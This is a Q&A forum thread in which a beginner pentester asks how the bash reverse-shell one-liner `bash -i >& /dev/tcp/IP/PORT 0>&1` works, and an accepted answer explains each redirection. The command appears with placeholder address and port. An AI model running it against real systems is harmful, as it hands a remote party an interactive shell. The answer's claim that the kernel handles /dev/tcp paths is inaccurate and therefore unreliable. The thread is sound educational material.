# Can someone explain how does this command works? bash -i >& /dev/tcp/"IP"/"PORT" 0>&1

Tags: linux, bash

guys. I recently start to learn pentesting and often see this command

```
bash -i >& /dev/tcp/"IP Address"/"Port" 0>&1.
```

I know it send a "reverse shell", but I dont understand how does it works. Can someone explain me please?

As I understand it, we redirect stdin to **&** (Am I right?), then create a connection to the specified IP and port, and then some magic begins that I don't understand **(0>&1)**

*P.S. Sorry for my English :)*

Comment: May be this post could help you : https://unix.stackexchange.com/questions/521596/what-does-the-01-shell-redirection-mean
And this page : https://www.xmodulo.com/tcp-udp-socket-bash-shell.html

Answer (score 0, accepted):

> I know it send a "reverse shell", but I dont understand how does it works. Can someone explain me please?
>
> As I understand it, we redirect stdin to **&** (Am I right?)

No, you are not right.  `>&` is a two-character redirection operator, not a separate `>` and `&`.  The preferred spelling is the reverse, `&>`.  It redirects both the standard output and the standard error to the same destination.

> , then create a connection to the specified IP and port,

Yes, more or less.  The `/dev/tcp/"IP Address"/"Port"` is the target of the preceding redirection operator, so the shell attempts to open that file.  It is not a *regular* file, however.  The kernel handles a request to open a file with a name of that form by (attempting to) open a TCP connection to the specified port at the specified address.  On success, you effectively get a connected socket, so writing to it sends data to the remote peer, and reading from it receives data.

*And that is the operand of the preceding redirection operator*, so altogether, `>& /dev/tcp/"IP Address"/"Port"` redirects the command's standard output and standard error to the remote host.

> and then some magic begins that I don't understand **(0>&1)**

Given that `1` is a sequence of (one) decimal digits, that is a file descriptor duplication: file descriptor 0, which corresponds to the command's standard input, is made a copy of file descriptor 1, which corresponds to the command's standard output, subject to the standard output redirection that already occurred.  Supposing that the prior redirection succeeded, that associates the command's standard input with the network socket as well.

All that's left is the leading `bash -i`, which is the actual command to which the redirections apply: an interactive shell.